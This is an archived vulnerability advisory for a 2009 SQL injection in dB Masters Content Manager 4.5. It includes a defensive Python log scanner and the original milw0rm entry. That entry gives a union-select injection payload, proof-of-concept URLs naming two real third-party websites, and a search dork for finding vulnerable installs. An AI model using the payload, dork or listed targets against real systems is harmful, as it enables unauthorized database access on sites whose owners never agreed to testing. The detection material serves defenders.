Vendor: Content Manager
By: NoGe
CVSS: 7,5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Content Manager
Affected Version From: 4.5
Affected Version To: 4.5
Patch Exists: Yes
Related CWE: N/A
CPE: a:dbmasters:content_manager:4.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

dB Masters Multimedia’s Content Manager 4.5 SQL Injection Vulnerability

The vulnerability exists in the index.php file of dB Masters Multimedia's Content Manager version 4.5. An attacker can exploit it by injecting SQL through the vulnerable 'id' parameter of index.php. An example of a malicious value is '-57+union+select+1,version()--'. This allows the attacker to execute arbitrary SQL commands on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update to the latest version of the software.
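
For defenders checking whether an unpatched install has been probed, the following added example (not part of the original advisory or the vendor's code) scans web server access-log lines for requests to index.php whose n or id parameter is not a plain integer. The Combined Log Format, the assumption that legitimate values are non-negative integers, and the sample log lines are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a Combined Log Format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate n/id values are plain non-negative integers.
NUMERIC_RE = re.compile(r"\d+")
# Tokens typical of the injection string shown in the advisory.
SQL_HINT_RE = re.compile(r"\bunion\b.*\bselect\b|--|/\*|\bversion\s*\(", re.I | re.S)

def inspect_line(line):
    """Return a list of (param, decoded_value, reason) findings for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/index.php"):
        return []
    findings = []
    # parse_qs percent-decodes and turns '+' into a space, as PHP does.
    params = parse_qs(url.query, keep_blank_values=True)
    for name in ("n", "id"):
        for value in params.get(name, []):
            if NUMERIC_RE.fullmatch(value):
                continue
            reason = "sql-keywords" if SQL_HINT_RE.search(value) else "non-numeric"
            findings.append((name, value, reason))
    return findings

def scan(lines):
    """Map 1-based line number -> findings, for lines with at least one finding."""
    return {i: f for i, l in enumerate(lines, 1) if (f := inspect_line(l))}

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Jul/2009:10:00:01 +0000] "GET /cms/index.php?n=62&id=57 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [16/Jul/2009:10:00:07 +0000] "GET /cms/index.php?n=62&id=-57+union+select+1,version()-- HTTP/1.1" 200 4875',
    '203.0.113.9 - - [16/Jul/2009:10:00:09 +0000] "GET /cms/index.php?n=1&id=-1%20UNION%20SELECT%201,version()-- HTTP/1.1" 200 4875',
    '203.0.113.7 - - [16/Jul/2009:10:00:12 +0000] "GET /cms/index.php?n=1&id=abc HTTP/1.1" 200 300',
    '203.0.113.7 - - [16/Jul/2009:10:00:15 +0000] "GET /cms/style.css?id=-1+union+select+1 HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG).items():
        print(lineno, findings)
```

The same integer-only rule can be enforced in front of the application (for example in a WAF or reverse proxy) as a stopgap until the vendor patch is installed.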

Exploit-DB raw data:

===========================================================================================


  [o] dB Masters Multimedia's Content Manager 4.5 SQL Injection Vulnerability

       Software : dB Masters Multimedia's Content Manager version 4.5
       Vendor   : http://www.dbmasters.net/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


===========================================================================================


  [o] Vulnerable file

       index.php



  [o] Exploit

       http://localhost/[path]/index.php?n=xx&id=[SQL]



  [o] Proof of concept

       http://www.fosada.za.org/index.php?n=62&id=-57+union+select+1,version()--
       http://www.colourmebeautiful.com.au/index.php?n=1&id=-1+union+select+1,version()--



  [o] Dork

       "Powered by dB Masters Multimedia's Content Manager"


===========================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/news ]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa Angela Zhang
       H312Y yooogy mousekill }^-^{ kaka11 zxvf martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


===========================================================================================

# milw0rm.com [2009-07-16]